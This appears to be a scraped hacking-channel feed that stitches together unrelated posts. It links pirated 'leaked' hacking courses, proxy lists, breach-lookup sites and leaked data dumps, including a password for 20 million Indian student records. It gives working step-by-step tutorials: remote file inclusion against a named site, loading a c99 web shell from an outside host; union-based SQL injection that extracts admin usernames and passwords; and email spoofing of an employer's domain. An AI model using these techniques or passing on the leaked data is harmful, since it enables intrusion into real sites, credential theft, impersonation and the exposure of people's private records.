Freelearningtech

INTRODUCING IHIDE – A NEW JAILBREAK DETECTION BYPASS TOOL https://www.trustedsec.com/blog/introducing-ihide-a-new-jailbreak-detection-bypass-tool/

hpAndro Vulnerable Application Challenges part 1 - https://nibarius.github.io/learning-frida/2021/08/26/hpandro-part1 part 2 - https://nibarius.github.io/learning-frida/2021/08/28/hpandro-part2 part 3 - https://nibarius.github.io/learning-frida/2021/08/29/hpandro-hidden-levels ⚡️JOIN FOR MORE⚡️ 👉🏻 https://Telegram.dog/cybritexsecurity

Pakistan Police Traffic System Leak the files that are in the reports folder are in base64 you must decode to see the HTML and run it in your browser to see the locations

LEAKED Mobile Application Hacking and Penetration Testing Course (Android) 2021 What you’ll learn ☑️You will understand the different types of vulnerabilities that affect mobile applications and have the practical knowledge to attack and exploit them. ☑️Perform real-world attacks on Android Devices and Apps. Link : https://drive.google.com/file/d/1ArjniaQ1t3dZTk50C7LY_mOQ843xMMHI/view

Hacking Course Worth Rs. 8430/- FREE !!! Link : https://mega.nz/folder/qwUnACSB#97s7X4qUmNb1KSHuPWYxaQ/folder/btEVyKzL

Web proxies :- 4Ever Proxy – http://4everproxy.com/ America Proxy – http://americaproxy.info/ Anony Mizer – https://www.anonymizer.com/ Anonymouse – http://anonymouse.org/anonwww.html Brazil Proxy – http://brazilproxy.info/ Ca Proxies – http://caproxies.info/ Canada Proxy – http://canadaproxy.info/ Change IP & Country – http://anonymizer.nntime.com/ Cool Proxy – https://www.coolproxy.biz/ Crazy Proxy – https://www.crazyproxy.org/ DeFilter – http://defilter.us/ Don’t Filter – http://dontfilter.us/ ECXS – https://www.ecxs.asia/ England Proxy – https://www.englandproxy.co.uk/ Europe Proxy – https://www.europeproxy.eu/ Extreme Proxy – https://www.extremeproxy.us/ Fast School Proxy – https://www.fastschoolproxy.com/ Fast Time – http://fasttime.info/ Fast USA Proxy – http://fastusaproxy.com/ FB Proxies – http://fbproxies.info/ Fish Proxy – http://fishproxy.com/ Free Open Proxy – http://www.freeopenproxy.com/ Free Proxy Server – https://www.freeproxyserver.uk/ Free Publick Proxy – http://www.freepublicproxy.net/ Free You Proxy Tube – https://www.freeyouproxytube.com/ Free YouTube Proxy – http://www.youtubeunblockproxy.com/ Go Proxy – https://www.goproxy.asia/ Greatest Free Proxy – http://www.greatestfreeproxy.com/ Hidden Digital Info – http://hiddendigital.info/ Hide IP Proxy – https://hideipproxy.com/ Hide Me Ass – https://www.hidemeass.co.uk/ Hide N Seek – http://www.hidenseek.org/ Hide The Internet – https://www.hidetheinternet.com/ Hidester – https://hidester.com/proxylist/ Hope Proxy – http://www.hopeproxy.com/ Host App – http://hostapp.eu/ Intern Cloud – http://interncloud.info/ IP Switcher – https://www.ipswitcher.us/ Just Proxy – http://www.justproxy.co.uk/ Just Unblock It – https://www.justunblockit.com/ King Surf Proxy – http://www.kingsurfproxy.com/ Korea Proxy – http://krproxy.info/ KProxy Site – http://www.kproxysite.com/ Me Hide – https://www.mehide.asia/ Mega Proxy – https://www.megaproxy.asia/ Monster Proxy – https://www.monsterproxy.co.uk/ Network Bypass – https://www.networkbypass.com/ New IP Now – http://newipnow.com/ Ninja Cloak – http://ninjacloak.com/ Orange Proxy – https://www.orangeproxy.net/ PHP Proxy – http://www.phproxysite.com/ PK Proxy – http://pkproxy.info/ Private Surf – https://www.privatesurf.us/ Pro Intern – http://prointern.info/ Prox Me Call Me Names – http://www.proxmecallmenames.com/ Proxay – https://www.proxay.co.uk/ Proxy – http://proxy.org/ Proxy 2014 – http://www.proxy-2014.com/ Proxy 2015 – http://proxy-2015.info/ Proxy 4 Freedom – http://proxy4freedom.com/ Proxy Browse – http://proxybrowse.info/ Proxy Internet – http://proxy-internet.info/ Proxy One – https://www.proxyone.net/ Proxy Pirate – https://www.proxypirate.co.uk/ Proxy Power – https://www.proxypower.co.uk/ Proxy Site – https://www.proxysite.com/ Proxy This – https://www.proxythis.info/ Proxy Tube – https://www.proxytube.info/ Proxyfree – https://www.proxfree.com/ Pun Proxy – https://www.funproxy.net/ Push Proxy – https://www.pushproxy.com/ Quick Proxy – http://www.quickproxy.co.uk/ Rapid Proxy – https://www.rapidproxy.us/ Remove Filters – https://www.removefilters.net/ Rexoss – http://rexoss.com/ Safe Proxy – https://www.safeproxysite.com/ Saoudi Proxy – http://saoudiproxy.info/ See Proxy – http://seeproxy.me/ Singapore Proxy – http://singaporeproxy.nu/ Sporium – http://sporium.org/ SSL Proxy – https://www.sslproxy.org.uk/ Stardoll Proxy – https://www.stardollproxy.com/ Stealth Proxy – https://www.stealthproxy.co.uk/ Suede Proxy – http://suedeproxy.info/ Surf for Free – http://surf-for-free.com/ Surf Proxy – http://surfproxy.co/ The Best Proxy – https://www.thebestproxy.info/ Travel VPN – http://travelvpn.info/ UK – Proxy – https://www.uk-proxy.org.uk/ Unblocker – https://www.unblocker.us/ Unlock My Web – http://www.unblockmyweb.com/ US Proxies – http://usproxies.info/ View Youtube – http://www.viewyoutube.net/ VPN Browse – http://vpnbrowse.com/ VTunnel – http://vtunnel.com/

Freelearningtech Hey Freelearningtech is a Free platform for sharing Cyber security resources, CEH Resources, Networking and CCNA Resources , MCSA and Digital Marketing etc. Here you can get daily free resources about technology. 👉🏻 https://telegram.dog/freelearningtech Website - https://freelearningtech.in/ JOIN US ❤️

🗞️ Advanced React For Enterprise: React For Senior Engineers 🗞️ 🎾 What you'll learn:-) 🚥 Css architecture of frontend codebases. 🚥 Design patterns for creating reusable react components Creating maintainable and team effective components with Typescript. 🚥 Creating, deploying and managing npm packages Accessibility of custom components & accessibility testing. 🚥Performance optimisation for styles in React codebases Unit and visual regression testing. 🚥 Storybook and component libraries. 🚥 Continuous integration and deployments for the modern software engineer. 🍑 Size:-) 2.35 GB 🐛 Link:-) 🐛 https://drive.google.com/folderview?id=1qKbGyIsKJaxUHPcYhkH7niqw1dVYomGV 🙏🏻🚩 JAI SHREE RAM 🚩🙏🏻

How To Hack Sites Using Remote File Inclusion Lets Start 1st Find a Vunerable websites using Google Dork “inurl:index.php?page=” its Most Popular Dork of RFI hacking “inurl:index.php?page=” its Most Popular Dork of RFI hacking This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command www.targetsite.com/index.php?page=www.google.com See example of this website http://www.cbspk.com So the hacker url will become http://www.cbspk.com/v2/index.php?page=http://www.google.com If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack. Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below: The hacker would first upload the shells to a webhosting site such as ripway.com, viralhosts.com,110mb.com or another free hosts etc. Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is http://www.sh3ll.org/c99.txt? Now here is how a hacker would execute the following command to gain access http://www.cbspk.com/v2/index.php?page=http://www.sh3ll.org/c99.t xt? Don't Forget To add “?” after .txt at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it he can upload & deface pages. How to Protect your Websites and Forums from Remote file inclusion attack? As we are ethical hackers i will also explain for webmasters to protect their websites from RFI attack. To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled. Note: Website hacking is illegal, this article is for Educational purposes only

A selection of services for collecting information A selection of great search engines for OSINT, which include modules for collecting information about email, phone numbers, domains, ip-addresses, photos, people, ad modules and more: ◾️ https://leak.sx ◾️ http://scylla.sh ◾️ https://intelx.io ◾️ https://4iq.com ◾️ https://leaked.site ◾️ https://hashes.org ◾️ https://leakcheck.io ◾️ https://vigilante.pw ◾️ https://leakcheck.net ◾️ https://weleakinfo.to ◾️ https://leakcorp.com ◾️ https://leakpeek.com ◾️ https://rslookup.com ◾️ https://snusbase.com ◾️ https://ghostproject.fr ◾️ https://leakedsource.ru ◾️ https://leak-lookup.com ◾️ https://nuclearleaks.com ◾️ https://private-base.info ◾ https://T.me/Hackfreaks ◾️ https://haveibeensold.app ◾️ https://breachchecker.com ◾️ https://www.dehashed.com ◾️ http://scatteredsecrets.com ◾️ https://haveibeenpwned.com ◾️ https://haveibeenpwned.com ◾️ https://services.normshield.com ◾️ https://joe.black/leakengine.html

We see password on the screen in hash or plain-text, it depends of how the database is set up i.e md5 hash, mysql hash, sha1… Now we must complete the query. For that we can use concat() function (it joins strings) i.e http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/* Note that I put 0x3a, its hex value for : (so 0x3a is hex value for colon) (there is another way for that, char(58), ascii value for : ) http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/* Now we get displayed username:password on screen, i.e admin:admin or admin:somehash When you have this, you can login like the admin or superuser. If can’t guess the right table name, you can always try mysql.user (default) It has user password columns, so an example would: http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/* 6). MySQL 5 As mentioned before, I’m going to explain how to get table and column names in MySQL > 5. For this we need information_schema. It holds all tables and columns in database. To get tables we use table_name and information_schema.tables. i.e http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/* Here we replace the number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables. i.e http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/* Note that I put 0,1 (get 1 result starting from the 0th) To view the second table, we change limit 0,1 to limit 1,1 i.e http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/* The second table is displayed. For third table we put limit 2,1 i.e http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/* Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc… Use the same method to get the column names. Here we use column_name and information_schema.columns. The method is the same as above, so for example: http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/* The first column is displayed.The second one (we change limit 0,1 to limit 1,1) i.e. http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/* The second column is displayed, so keep incrementing until you get something like username,user,login, password, pass, passwd etc… If you want to display column names for a specific table, use this query. Let’s say that we found table users. i.e http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/* Now we get column name in table users. Just using LIMIT we can list all columns in table users.Note that this won’t work if the magic quotes are ON. Let’s say that we found columns username, password, and email. Now to complete the query, put them all together. For that we use concat() , I described it earlier. i.e http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/ What we get here is user:pass:email from table users. Example: admin:hash:whatever@blabla.com

Analyize Website Loopholes Practical way of SQL Injection First of all we must find out our target website. I have collected a lot of dorks i.e the vulnerability points of the websites. Some Google searches can be wonderfully utilized to find out vulnerable websites. Below is example of some queries. Examples: Open Google and copy and paste these queries: inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= Here are some additional queries (use them without quotation marks). 1). Check for vulnerability Let’s say that we have a site like this : http://www.site.com/news.php?id=5 To test if is vulernable, we add to the end of url ‘ (quote), and that would be http://www.site.com/news.php?id=5′ If we get an message like: “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…” or something similar, that means the site is vulnerable to SQL injection. 2). Find the number of columns To find the number of columns we use the statement ORDER BY (tells the database how to order the result). Increment the number until we get an error. http://www.site.com/news.php?id=5 order by 1/* <– no error http://www.site.com/news.php?id=5 order by 2/* <– no error http://www.site.com/news.php?id=5 order by 3/* <– no error http://www.site.com/news.php?id=5 order by 4/* <– error (we get message like this unknown column ‘4’ in ‘order clause’ or something like that) that means that it has 3 columns, because we got an error on 4. 3). Check for UNION function With union, we can select more data in one sql statement. So we have http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). ) If we see some numbers on screen, i.e 1 or 2 or 3, then the UNION works . 4). Check for MySQL version http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try — it’s a comment and it’s important for our query to work properly. Let’s say that we have the number 2 on the screen, now to check for the version. We replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar. It should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/* If you get an error “union illegal mix of collations (IMPLICIT COERCIBLE) …” I didn’t see any paper covering this problem, so I must write it. What we need is convert() function i.e. http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/* or with hex() and unhex() i.e. http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/* and you will get MySQL version. 5). Getting table and column name Well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…). Later I will describe the MySQL > 5 version. We must guess table and column name in most cases. Common table names are: user/s, admin/s, member/s … Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc… i.e would be http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good ) We know that table admin exists. Now to check column names: http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name). We get a username displayed on screen, examplse would be admin, or superadmin etc… Now to check if column password exists http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

20million indian students data leak, pru722 - password https://mega.nz/file/cTJHTYCI#6ztuCf7D91gcpHCh0watZDgVd5RQ8hW_ebte0RzD1D4

How I hacked my Employer's Email | Email Spoofing Hey Guys! This is my first Post in Out Of the Box. I wanna reveal some part of my life. Actually, I had worked in a BPO Company. I can't reveal it's name. When i was working there, my HR handed me their Email address to contact them. So, when i returned home i decided to play around with that Email address. So, I was eager to find if their was SPF record missing. And Guess what i have found that they have the vulnerability to spoof their Emails. I just hacked their Email and sent a Prank mail to my colleague showing hrexecutive@company.com. What is SPF Record? An SPF record is a type of Domain Name Service (DNS) record that identifies which mail servers are permitted to send email on behalf of your domain. The purpose of an SPF record is to prevent spammers from sending messages with forged From addresses at your domain. Once There is No SPF Records. An Attacker Can Spoof Email Via any Fake Mailer Like Emkei.cz. An Attacker Can Send Email From name "Support" and Email: "support@target.com". With Social Engineering Attack He Can TakeOver User Account Let Victim Knows the Phishing Attack but When He See The Email from the Authorized Domain. He Got tricked Easily. Note : It does not work if you send the mail to gmail accounts as google has a good spam filter to prevent this. How to do it Practically? Step 1 - You need to check if the domain owner has protected their domain against this. You can check it on https://www.valimail.com or http://www.kitterman.com/spf/validate.html. If it says protected it does not work. If only one of the 2 records shows protected you can try. Step 2 - Go to emkei.cz and fill the form with your mail and hit send. Now the email is on it's way with a fake mail as sender. This is how i do that! But You're Employer would fire you if you told them 😁. If you find any vulnerability like this you can report them! Enjoy :)